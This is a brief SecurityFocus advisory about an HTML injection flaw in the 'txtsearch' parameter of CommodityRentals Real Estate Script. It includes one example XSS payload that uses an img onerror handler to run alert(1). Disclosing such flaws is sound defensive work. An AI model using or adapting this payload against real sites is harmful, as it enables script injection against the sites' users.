CommodityRentals Real Estate Script 'txtsearch' Parameter HTML Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example input is available:

"/></a></><img src=1.gif onerror=alert(1)>


 

Privacy Statement
Copyright 2010, SecurityFocus